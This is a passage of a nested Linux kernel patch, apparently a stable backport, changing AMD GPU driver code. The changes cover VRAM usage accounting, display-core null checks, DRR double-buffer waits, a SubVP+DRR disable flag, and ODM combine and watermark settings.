+diff --git a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+index 31776b12e4c45..4b0d563c6522c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
++++ b/drivers/gpu/drm/amd/amdgpu/nbio_v7_2.c
+@@ -382,6 +382,11 @@ static void nbio_v7_2_init_registers(struct amdgpu_device *adev)
+ 		if (def != data)
+ 			WREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regBIF1_PCIE_MST_CTRL_3), data);
+ 		break;
++	case IP_VERSION(7, 5, 1):
++		data = RREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2);
++		data &= ~RCC_DEV2_EPF0_STRAP2__STRAP_NO_SOFT_RESET_DEV2_F0_MASK;
++		WREG32_SOC15(NBIO, 0, regRCC_DEV2_EPF0_STRAP2, data);
++		fallthrough;
+ 	default:
+ 		def = data = RREG32_PCIE_PORT(SOC15_REG_OFFSET(NBIO, 0, regPCIE_CONFIG_CNTL));
+ 		data = REG_SET_FIELD(data, PCIE_CONFIG_CNTL,
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+index 6d291aa6386bd..f79b8e964140e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_chardev.c
+@@ -1127,8 +1127,13 @@ static int kfd_ioctl_alloc_memory_of_gpu(struct file *filep,
+ 	}
+ 
+ 	/* Update the VRAM usage count */
+-	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM)
+-		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + args->size);
++	if (flags & KFD_IOC_ALLOC_MEM_FLAGS_VRAM) {
++		uint64_t size = args->size;
++
++		if (flags & KFD_IOC_ALLOC_MEM_FLAGS_AQL_QUEUE_MEM)
++			size >>= 1;
++		WRITE_ONCE(pdd->vram_usage, pdd->vram_usage + PAGE_ALIGN(size));
++	}
+ 
+ 	mutex_unlock(&p->mutex);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index af16d6bb974b7..1ba8a2905f824 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1239,7 +1239,7 @@ static void mmhub_read_system_context(struct amdgpu_device *adev, struct dc_phy_
+ 	pa_config->gart_config.page_table_end_addr = page_table_end.quad_part << 12;
+ 	pa_config->gart_config.page_table_base_addr = page_table_base.quad_part;
+ 
+-	pa_config->is_hvm_enabled = 0;
++	pa_config->is_hvm_enabled = adev->mode_info.gpu_vm_support;
+ 
+ }
+ 
+@@ -1551,6 +1551,11 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	if (amdgpu_dc_feature_mask & DC_DISABLE_LTTPR_DP2_0)
+ 		init_data.flags.allow_lttpr_non_transparent_mode.bits.DP2_0 = true;
+ 
++	/* Disable SubVP + DRR config by default */
++	init_data.flags.disable_subvp_drr = true;
++	if (amdgpu_dc_feature_mask & DC_ENABLE_SUBVP_DRR)
++		init_data.flags.disable_subvp_drr = false;
++
+ 	init_data.flags.seamless_boot_edp_requested = false;
+ 
+ 	if (check_seamless_boot_capability(adev)) {
+@@ -2747,12 +2752,14 @@ static int dm_resume(void *handle)
+ 	drm_for_each_connector_iter(connector, &iter) {
+ 		aconnector = to_amdgpu_dm_connector(connector);
+ 
++		if (!aconnector->dc_link)
++			continue;
++
+ 		/*
+ 		 * this is the case when traversing through already created
+ 		 * MST connectors, should be skipped
+ 		 */
+-		if (aconnector->dc_link &&
+-		    aconnector->dc_link->type == dc_connection_mst_branch)
++		if (aconnector->dc_link->type == dc_connection_mst_branch)
+ 			continue;
+ 
+ 		mutex_lock(&aconnector->hpd_lock);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+index 22125daf9dcfe..78c2ed59e87d2 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_crtc.c
+@@ -77,6 +77,9 @@ int dm_set_vupdate_irq(struct drm_crtc *crtc, bool enable)
+ 	struct amdgpu_device *adev = drm_to_adev(crtc->dev);
+ 	int rc;
+ 
++	if (acrtc->otg_inst == -1)
++		return 0;
++
+ 	irq_source = IRQ_TYPE_VUPDATE + acrtc->otg_inst;
+ 
+ 	rc = dc_interrupt_set(adev->dm.dc, irq_source, enable) ? 0 : -EBUSY;
+@@ -152,6 +155,9 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	struct vblank_control_work *work;
+ 	int rc = 0;
+ 
++	if (acrtc->otg_inst == -1)
++		goto skip;
++
+ 	if (enable) {
+ 		/* vblank irq on -> Only need vupdate irq in vrr mode */
+ 		if (amdgpu_dm_vrr_active(acrtc_state))
+@@ -169,6 +175,7 @@ static inline int dm_set_vblank(struct drm_crtc *crtc, bool enable)
+ 	if (!dc_interrupt_set(adev->dm.dc, irq_source, enable))
+ 		return -EBUSY;
+ 
++skip:
+ 	if (amdgpu_in_reset(adev))
+ 		return 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+index f47cfe6b42bd2..0765334f08259 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn314/dcn314_smu.c
+@@ -146,6 +146,9 @@ static int dcn314_smu_send_msg_with_param(struct clk_mgr_internal *clk_mgr,
+ 		if (msg_id == VBIOSSMC_MSG_TransferTableDram2Smu &&
+ 		    param == TABLE_WATERMARKS)
+ 			DC_LOG_WARNING("Watermarks table not configured properly by SMU");
++		else if (msg_id == VBIOSSMC_MSG_SetHardMinDcfclkByFreq ||
++			 msg_id == VBIOSSMC_MSG_SetMinDeepSleepDcfclk)
++			DC_LOG_WARNING("DCFCLK_DPM is not enabled by BIOS");
+ 		else
+ 			ASSERT(0);
+ 		REG_WRITE(MP1_SMN_C2PMSG_91, VBIOSSMC_Result_OK);
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc.c b/drivers/gpu/drm/amd/display/dc/core/dc.c
+index 0cb8d1f934d12..698ef50e83f3f 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc.c
+@@ -862,6 +862,7 @@ static bool dc_construct_ctx(struct dc *dc,
+ 
+ 	dc_ctx->perf_trace = dc_perf_trace_create();
+ 	if (!dc_ctx->perf_trace) {
++		kfree(dc_ctx);
+ 		ASSERT_CRITICAL(false);
+ 		return false;
+ 	}
+@@ -3334,6 +3335,21 @@ static void commit_planes_for_stream(struct dc *dc,
+ 
+ 	dc_z10_restore(dc);
+ 
++	if (update_type == UPDATE_TYPE_FULL) {
++		/* wait for all double-buffer activity to clear on all pipes */
++		int pipe_idx;
++
++		for (pipe_idx = 0; pipe_idx < dc->res_pool->pipe_count; pipe_idx++) {
++			struct pipe_ctx *pipe_ctx = &context->res_ctx.pipe_ctx[pipe_idx];
++
++			if (!pipe_ctx->stream)
++				continue;
++
++			if (pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear)
++				pipe_ctx->stream_res.tg->funcs->wait_drr_doublebuffer_pending_clear(pipe_ctx->stream_res.tg);
++		}
++	}
++
+ 	if (get_seamless_boot_stream_count(context) > 0 && surface_count > 0) {
+ 		/* Optimize seamless boot flag keeps clocks and watermarks high until
+ 		 * first flip. After first flip, optimization is required to lower
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link.c b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+index c88f044666fee..754fc86341494 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link.c
+@@ -1916,12 +1916,6 @@ struct dc_link *link_create(const struct link_init_data *init_params)
+ 	if (false == dc_link_construct(link, init_params))
+ 		goto construct_fail;
+ 
+-	/*
+-	 * Must use preferred_link_setting, not reported_link_cap or verified_link_cap,
+-	 * since struct preferred_link_setting won't be reset after S3.
+-	 */
+-	link->preferred_link_setting.dpcd_source_device_specific_field_support = true;
+-
+ 	return link;
+ 
+ construct_fail:
+diff --git a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+index dedd1246ce588..475ad3eed002d 100644
+--- a/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
++++ b/drivers/gpu/drm/amd/display/dc/core/dc_link_dp.c
+@@ -6554,18 +6554,10 @@ void dpcd_set_source_specific_data(struct dc_link *link)
+ 
+ 			uint8_t hblank_size = (uint8_t)link->dc->caps.min_horizontal_blanking_period;
+ 
+-			if (link->preferred_link_setting.dpcd_source_device_specific_field_support) {
+-				result_write_min_hblank = core_link_write_dpcd(link,
+-					DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
+-					sizeof(hblank_size));
+-
+-				if (result_write_min_hblank == DC_ERROR_UNEXPECTED)
+-					link->preferred_link_setting.dpcd_source_device_specific_field_support = false;
+-			} else {
+-				DC_LOG_DC("Sink device does not support 00340h DPCD write. Skipping on purpose.\n");
+-			}
++			result_write_min_hblank = core_link_write_dpcd(link,
++				DP_SOURCE_MINIMUM_HBLANK_SUPPORTED, (uint8_t *)(&hblank_size),
++				sizeof(hblank_size));
+ 		}
+-
+ 		DC_TRACE_LEVEL_MESSAGE(DAL_TRACE_LEVEL_INFORMATION,
+ 							WPP_BIT_FLAG_DC_DETECTION_DP_CAPS,
+ 							"result=%u link_index=%u enum dce_version=%d DPCD=0x%04X min_hblank=%u branch_dev_id=0x%x branch_dev_name='%c%c%c%c%c%c'",
+diff --git a/drivers/gpu/drm/amd/display/dc/dc.h b/drivers/gpu/drm/amd/display/dc/dc.h
+index 85ebeaa2de186..37998dc0fc144 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc.h
++++ b/drivers/gpu/drm/amd/display/dc/dc.h
+@@ -410,7 +410,7 @@ struct dc_config {
+ 	bool force_bios_enable_lttpr;
+ 	uint8_t force_bios_fixed_vs;
+ 	int sdpif_request_limit_words_per_umc;
+-
++	bool disable_subvp_drr;
+ };
+ 
+ enum visual_confirm {
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+index 2c54b6e0498bf..296793d8b2bf2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
++++ b/drivers/gpu/drm/amd/display/dc/dc_dp_types.h
+@@ -149,7 +149,6 @@ struct dc_link_settings {
+ 	enum dc_link_spread link_spread;
+ 	bool use_link_rate_set;
+ 	uint8_t link_rate_set;
+-	bool dpcd_source_device_specific_field_support;
+ };
+ 
+ union dc_dp_ffe_preset {
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+index 88ac5f6f4c96c..0b37bb0e184b2 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn10/dcn10_optc.h
+@@ -519,7 +519,8 @@ struct dcn_optc_registers {
+ 	type OTG_CRC_DATA_STREAM_COMBINE_MODE;\
+ 	type OTG_CRC_DATA_STREAM_SPLIT_MODE;\
+ 	type OTG_CRC_DATA_FORMAT;\
+-	type OTG_V_TOTAL_LAST_USED_BY_DRR;
++	type OTG_V_TOTAL_LAST_USED_BY_DRR;\
++	type OTG_DRR_TIMING_DBUF_UPDATE_PENDING;
+ 
+ #define TG_REG_FIELD_LIST_DCN3_2(type) \
+ 	type OTG_H_TIMING_DIV_MODE_MANUAL;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+index 867d60151aebb..08b92715e2e64 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.c
+@@ -291,6 +291,14 @@ static void optc3_set_timing_double_buffer(struct timing_generator *optc, bool e
+ 		   OTG_DRR_TIMING_DBUF_UPDATE_MODE, mode);
+ }
+ 
++void optc3_wait_drr_doublebuffer_pending_clear(struct timing_generator *optc)
++{
++	struct optc *optc1 = DCN10TG_FROM_TG(optc);
++
++	REG_WAIT(OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, 0, 2, 100000); /* 1 vupdate at 5hz */
++
++}
++
+ void optc3_set_vtotal_min_max(struct timing_generator *optc, int vtotal_min, int vtotal_max)
+ {
+ 	optc1_set_vtotal_min_max(optc, vtotal_min, vtotal_max);
+@@ -360,6 +368,7 @@ static struct timing_generator_funcs dcn30_tg_funcs = {
+ 		.program_manual_trigger = optc2_program_manual_trigger,
+ 		.setup_manual_trigger = optc2_setup_manual_trigger,
+ 		.get_hw_timing = optc1_get_hw_timing,
++		.wait_drr_doublebuffer_pending_clear = optc3_wait_drr_doublebuffer_pending_clear,
+ };
+ 
+ void dcn30_timing_generator_init(struct optc *optc1)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+index dd45a5499b078..fb06dc9a48937 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_optc.h
+@@ -279,6 +279,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_BY2, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_BLANK_DATA_DOUBLE_BUFFER_EN, mask_sh)
+ 
+@@ -317,6 +318,7 @@
+ 	SF(OTG0_OTG_DRR_TRIGGER_WINDOW, OTG_DRR_TRIGGER_WINDOW_END_X, mask_sh),\
+ 	SF(OTG0_OTG_DRR_V_TOTAL_CHANGE, OTG_DRR_V_TOTAL_CHANGE_LIMIT, mask_sh),\
+ 	SF(OTG0_OTG_H_TIMING_CNTL, OTG_H_TIMING_DIV_MODE, mask_sh),\
++	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_PENDING, mask_sh),\
+ 	SF(OTG0_OTG_DOUBLE_BUFFER_CONTROL, OTG_DRR_TIMING_DBUF_UPDATE_MODE, mask_sh)
+ 
+ void dcn30_timing_generator_init(struct optc *optc1);
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+index 38842f938bed0..0926db0183383 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_dio_stream_encoder.c
+@@ -278,10 +278,10 @@ static void enc314_stream_encoder_dp_blank(
+ 	struct dc_link *link,
+ 	struct stream_encoder *enc)
+ {
+-	/* New to DCN314 - disable the FIFO before VID stream disable. */
+-	enc314_disable_fifo(enc);
+-
+ 	enc1_stream_encoder_dp_blank(link, enc);
++
++	/* Disable FIFO after the DP vid stream is disabled to avoid corruption. */
++	enc314_disable_fifo(enc);
+ }
+ 
+ static void enc314_stream_encoder_dp_unblank(
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+index 79850a68f62ab..73f519dbdb531 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_resource.c
+@@ -892,6 +892,8 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.force_abm_enable = false,
+ 	.timing_trace = false,
+ 	.clock_trace = true,
++	.disable_dpp_power_gate = true,
++	.disable_hubp_power_gate = true,
+ 	.disable_pplib_clock_request = false,
+ 	.pipe_split_policy = MPC_SPLIT_DYNAMIC,
+ 	.force_single_disp_pipe_split = false,
+@@ -901,7 +903,7 @@ static const struct dc_debug_options debug_defaults_drv = {
+ 	.max_downscale_src_width = 4096,/*upto true 4k*/
+ 	.disable_pplib_wm_range = false,
+ 	.scl_reset_length10 = true,
+-	.sanity_checks = false,
++	.sanity_checks = true,
+ 	.underflow_assert_delay_us = 0xFFFFFFFF,
+ 	.dwb_fi_phase = -1, // -1 = disable,
+ 	.dmub_command_table = true,
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+index d3b5b6fedf042..6266b0788387e 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20.c
+@@ -3897,14 +3897,14 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > mode_lib->vba.MaxDispclkRoundedDownToDFSGranularity) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -3957,7 +3957,7 @@ void dml20_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+index edd098c7eb927..989d83ee38421 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn20/display_mode_vba_20v2.c
+@@ -4008,17 +4008,17 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN20_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN20_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4071,7 +4071,7 @@ void dml20v2_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+index 1d84ae50311d9..b7c2844d0cbee 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn21/display_mode_vba_21.c
+@@ -4102,17 +4102,17 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine = mode_lib->vba.PixelClock[k] / 2
+ 							* (1 + mode_lib->vba.DISPCLKDPPCLKDSCCLKDownSpreading / 100.0);
+ 
+-				locals->ODMCombineEnablePerState[i][k] = false;
++				locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 				mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithoutODMCombine;
+ 				if (mode_lib->vba.ODMCapability) {
+ 					if (locals->PlaneRequiredDISPCLKWithoutODMCombine > MaxMaxDispclkRoundedDown) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->DSCEnabled[k] && (locals->HActive[k] > DCN21_MAX_DSC_IMAGE_WIDTH)) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					} else if (locals->HActive[k] > DCN21_MAX_420_IMAGE_WIDTH && locals->OutputFormat[k] == dm_420) {
+-						locals->ODMCombineEnablePerState[i][k] = true;
++						locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_2to1;
+ 						mode_lib->vba.PlaneRequiredDISPCLK = mode_lib->vba.PlaneRequiredDISPCLKWithODMCombine;
+ 					}
+ 				}
+@@ -4165,7 +4165,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 				locals->RequiredDISPCLK[i][j] = 0.0;
+ 				locals->DISPCLK_DPPCLK_Support[i][j] = true;
+ 				for (k = 0; k <= mode_lib->vba.NumberOfActivePlanes - 1; k++) {
+-					locals->ODMCombineEnablePerState[i][k] = false;
++					locals->ODMCombineEnablePerState[i][k] = dm_odm_combine_mode_disabled;
+ 					if (locals->SwathWidthYSingleDPP[k] <= locals->MaximumSwathWidth[k]) {
+ 						locals->NoOfDPP[i][j][k] = 1;
+ 						locals->RequiredDPPCLK[i][j][k] = locals->MinDPPCLKUsingSingleDPP[k]
+@@ -5230,7 +5230,7 @@ void dml21_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 			mode_lib->vba.ODMCombineEnabled[k] =
+ 					locals->ODMCombineEnablePerState[mode_lib->vba.VoltageLevel][k];
+ 		} else {
+-			mode_lib->vba.ODMCombineEnabled[k] = false;
++			mode_lib->vba.ODMCombineEnabled[k] = dm_odm_combine_mode_disabled;
+ 		}
+ 		mode_lib->vba.DSCEnabled[k] =
+ 				locals->RequiresDSC[mode_lib->vba.VoltageLevel][k];
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index f94abd124021e..69e205ac58b25 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -877,6 +877,10 @@ static bool subvp_drr_schedulable(struct dc *dc, struct dc_state *context, struc
+ 	int16_t stretched_drr_us = 0;
+ 	int16_t drr_stretched_vblank_us = 0;
+ 	int16_t max_vblank_mallregion = 0;
++	const struct dc_config *config = &dc->config;
++
++	if (config->disable_subvp_drr)
++		return false;
+ 
+ 	// Find SubVP pipe
+ 	for (i = 0; i < dc->res_pool->pipe_count; i++) {
+@@ -2038,6 +2042,10 @@ void dcn32_calculate_wm_and_dlg_fpu(struct dc *dc, struct dc_state *context,
+ 		 */
+ 		context->bw_ctx.bw.dcn.watermarks.a = context->bw_ctx.bw.dcn.watermarks.c;
+ 		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.pstate_change_ns = 0;
++		/* Calculate FCLK p-state change watermark based on FCLK pstate change latency in case
++		 * UCLK p-state is not supported, to avoid underflow in case FCLK pstate is supported
++		 */
++		context->bw_ctx.bw.dcn.watermarks.a.cstate_pstate.fclk_pstate_change_ns = get_fclk_watermark(&context->bw_ctx.dml, pipes, pipe_cnt) * 1000;
+ 	} else {
+ 		/* Set A:
+ 		 * All clocks min.
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+index f4b176599be7a..0ea406145c1d7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn321/dcn321_fpu.c
+@@ -136,7 +136,7 @@ struct _vcs_dpi_soc_bounding_box_st dcn3_21_soc = {
+ 	.urgent_out_of_order_return_per_channel_pixel_only_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_pixel_and_vm_bytes = 4096,
+ 	.urgent_out_of_order_return_per_channel_vm_only_bytes = 4096,
+-	.pct_ideal_sdp_bw_after_urgent = 100.0,
++	.pct_ideal_sdp_bw_after_urgent = 90.0,
+ 	.pct_ideal_fabric_bw_after_urgent = 67.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_only = 20.0,
+ 	.pct_ideal_dram_sdp_bw_after_urgent_pixel_and_vm = 60.0, // N/A, for now keep as is until DML implemented
+diff --git a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+index 9b63c6c0cc844..e0bd0c722e006 100644
+--- a/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
++++ b/drivers/gpu/drm/amd/display/dc/gpio/dcn20/hw_factory_dcn20.c
+@@ -138,7 +138,8 @@ static const struct ddc_sh_mask ddc_shift[] = {
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 3),
+ 	DDC_MASK_SH_LIST_DCN2(__SHIFT, 4),
